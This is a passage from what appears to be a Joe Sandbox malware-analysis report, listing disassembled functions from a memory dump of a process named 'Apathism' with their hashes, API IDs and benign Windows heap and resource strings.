                          • Instruction Fuzzy Hash: 65E19B306087419FD724CF28C990F1AB7E4FB89358F104A69F5A9CB2E2DB74D955CB42
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                          • API String ID: 3446177414-3610490719
                          • Opcode ID: 866d19ca58cec92b36212cd7c3ff543a6a7f90433a780fe2437a24a3b2ee17a9
                          • Instruction ID: b69e993ccd08ed363e4198c62dbff4409d97231ffbafefba7164850a66090726
                          • Opcode Fuzzy Hash: 866d19ca58cec92b36212cd7c3ff543a6a7f90433a780fe2437a24a3b2ee17a9
                          • Instruction Fuzzy Hash: 2691EE71604B419FD725DB24C980F6AB7E9BF95B04F000669FA42DB292DF34ED41CBA2
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 223A728C
                          Strings
                          • RTL: Resource at %p, xrefs: 223A72A3
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 223A7294
                          • RTL: Re-Waiting, xrefs: 223A72C1
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: 094112783264ec28c8177fef4a09d1b045b613b6fd5a792265e9e095acb49d61
                          • Instruction ID: 1082ad3357ae8a88ee4e604b8ba2c94fc7d5cee234262b66c6d948853f46225f
                          • Opcode Fuzzy Hash: 094112783264ec28c8177fef4a09d1b045b613b6fd5a792265e9e095acb49d61
                          • Instruction Fuzzy Hash: 62414731710306ABD725CE24CCA0FAAB7AAFF94714F104629F955EB641DB30E802CBD5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 0ef5287a5c85498882260f1d5debbb7247dacb0ff8c59303e7e8f478ce4f0dd8
                          • Instruction ID: e694cfeb42853a9b381f5ec0a766146f83f376b88b61f808b6ee8bfd43061ba0
                          • Opcode Fuzzy Hash: 0ef5287a5c85498882260f1d5debbb7247dacb0ff8c59303e7e8f478ce4f0dd8
                          • Instruction Fuzzy Hash: 13315472A007299FDB20CE29CD40BEE77F8FF54614F404556E94AE7244EB70EA488FA1
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c16c06f71ae2895af29739f69bfed22a503ffcd27eeb124761fe5d8384a729a9
                          • Instruction ID: 43c70f194463ba4ea448127d724bdefe80482512aae20fe19abaabc83f91ff15
                          • Opcode Fuzzy Hash: c16c06f71ae2895af29739f69bfed22a503ffcd27eeb124761fe5d8384a729a9
                          • Instruction Fuzzy Hash: 2AE1CB74D00708DFCB25CFA9CA80A9DBBF5FF49304F20456AE94AA7261DB70AA51CF50
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: c2b79469edfb89bed094381574e87887615f7bca71bd853034972b5767c8dcb1
                          • Instruction ID: d3b6491443eb18be3e73d624f11739fd50aea208c27a875fc4a5b3ca709d2e52
                          • Opcode Fuzzy Hash: c2b79469edfb89bed094381574e87887615f7bca71bd853034972b5767c8dcb1
                          • Instruction Fuzzy Hash: 18713472E003199FDF05CFA4C990A9DBBB5FF48314F15412AEA05EB254DB35AA06CFA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 8788ed82b7f0a3c54582e6928aa1b590936b8f722e7516cd06dc6da485c5e1c2
                          • Instruction ID: 647932532b1fdb7102d259a8dde17fad49bd8420a14998ed790b1cc3a610367c
                          • Opcode Fuzzy Hash: 8788ed82b7f0a3c54582e6928aa1b590936b8f722e7516cd06dc6da485c5e1c2
                          • Instruction Fuzzy Hash: 51516A357007229FDB0CCE59C5A5A29B7F1BB89214B24457EDA06DB711DB78EE81CB80
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 101cfee53a024c8d7ae15235f3916907d6795f2cfd5c4b09174b8e5f22d9e289
                          • Instruction ID: a5982f872ee888fad466d676ee0e247ef14daaa528a98e86f17d99c66cba9235
                          • Opcode Fuzzy Hash: 101cfee53a024c8d7ae15235f3916907d6795f2cfd5c4b09174b8e5f22d9e289
                          • Instruction Fuzzy Hash: 925133B6E003199FDF08CF95C950ADDBBB5FF48314F14812AE915AB290DB399A01CF94
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                          • String ID:
                          • API String ID: 4281723722-0
                          • Opcode ID: 8edabca638f528cafa0abde3e36b25f7531f0ce419e17715ed40c606393adee3
                          • Instruction ID: 963b264476455c2ab072da1865bcde702d38bcbfe3973dd63c5ede1045d8a6c1
                          • Opcode Fuzzy Hash: 8edabca638f528cafa0abde3e36b25f7531f0ce419e17715ed40c606393adee3
                          • Instruction Fuzzy Hash: 40311475E40328DFCF19DFA9D894A9DBBB1FB48320F11462AEA12B7294DB355900CF54
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$Flst
                          • API String ID: 0-758220159
                          • Opcode ID: 2099d45c3ac0900342917b70ae1c4d7982e713a67d797c012e6df6d348789c9f
                          • Instruction ID: 88f3f8b0c9d8d4ddfc825c0acacc0ab84e1dfd94a8e49b2c96c24fecadfab010
                          • Opcode Fuzzy Hash: 2099d45c3ac0900342917b70ae1c4d7982e713a67d797c012e6df6d348789c9f
                          • Instruction Fuzzy Hash: AA51A071E003049FCB24CF99C68476DFBF8EF44728F15812AD2499F25AEB709A81CB84
                          APIs
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 223BCFBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: CallFilterFunc@8
                          • String ID: @$@4_w@4_w
                          • API String ID: 4062629308-713214301
                          • Opcode ID: f120cc8ca8574d1d881716c5511220b850c8d409ae87b0198530d8a9e425e451
                          • Instruction ID: 8637218a413bfbb77af52a81d4d74fecf706854c53420c12a641dbe58d833084
                          • Opcode Fuzzy Hash: f120cc8ca8574d1d881716c5511220b850c8d409ae87b0198530d8a9e425e451
                          • Instruction Fuzzy Hash: D7419DB1D00718DFCB218FA5C980AAEBBF8FF55708F00456AEA15EB654DB349941CB61